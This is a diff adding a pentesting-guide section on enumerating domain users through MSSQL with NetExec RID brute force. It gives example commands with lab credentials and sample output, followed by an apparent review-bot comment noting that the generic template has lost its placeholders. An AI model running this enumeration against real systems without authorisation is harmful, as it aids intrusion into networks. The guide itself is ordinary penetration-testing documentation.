diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 3c01bf224dd..7ec479290fa 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -79,6 +79,42 @@ msf> use windows/manage/mssql_local_auth_bypass ### [**Brute force**](../../generic-hacking/brute-force.md#sql-server) +### **User Enumeration via RID Brute Force** + +You can enumerate domain users through MSSQL by brute-forcing RIDs (Relative Identifiers). This technique is useful when you have valid credentials but limited privileges: +```bash +# Using NetExec (nxc) - formerly CrackMapExec +nxc mssql --local-auth -u -p '' --rid-brute 5000 + +# Examples: +nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000 +nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000 + +# Without --local-auth for domain accounts +nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000 +``` + +Expected output: + +``` +[snippet] +MSSQL 10.129.234.50 1433 DC 1104: REDELEGATE\Christine.Flanders +MSSQL 10.129.234.50 1433 DC 1105: REDELEGATE\Marie.Curie +MSSQL 10.129.234.50 1433 DC 1106: REDELEGATE\Helen.Frost +MSSQL 10.129.234.50 1433 DC 1107: REDELEGATE\Michael.Pontiac +MSSQL 10.129.234.50 1433 DC 1108: REDELEGATE\Mallory.Roberts +MSSQL 10.129.234.50 1433 DC 1109: REDELEGATE\James.Dinkleberg +[snippet] +``` + +**Parameters:** +- `--local-auth`: Use local authentication instead of domain +- `--rid-brute `: Brute force RIDs up to the specified number (default: 4000) +- `-u`: Username +- `-p`: Password + +This technique will enumerate users by querying the MSSQL server for account information associated with sequential RIDs. + ### Manual Enumeration #### Login
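Review bot: the generic command template in the new "User Enumeration via RID Brute Force" hunk has lost its placeholders: `nxc mssql --local-auth -u -p '' --rid-brute 5000` has nothing after `mssql`, `-u` and `-p`, and the parameter entry reads `--rid-brute ` with no value, which reads as if the target and username are optional. Most likely `<target>`, `<username>` and `<password>`-style placeholders were swallowed as HTML tags; escape them or use the backtick/angle-bracket placeholder style the rest of the file uses, e.g. `nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000` and `--rid-brute <max-rid>`. Two smaller points in the same hunk: the "Without --local-auth for domain accounts" example passes the domain as `DOMAIN\\user` inside `-u`, while NetExec's documented way to specify a Windows-auth domain is the `-d DOMAIN` flag, so either show `-d` or state that both forms work; and the closing sentence ("querying the MSSQL server for account information associated with sequential RIDs") should say what the server is actually being asked to do, i.e. resolve candidate domain SIDs (domain SID + sequential RID) to account names, and note that this requires the SQL Server to be domain-joined, otherwise the "limited privileges" claim gives readers no way to judge where the technique applies.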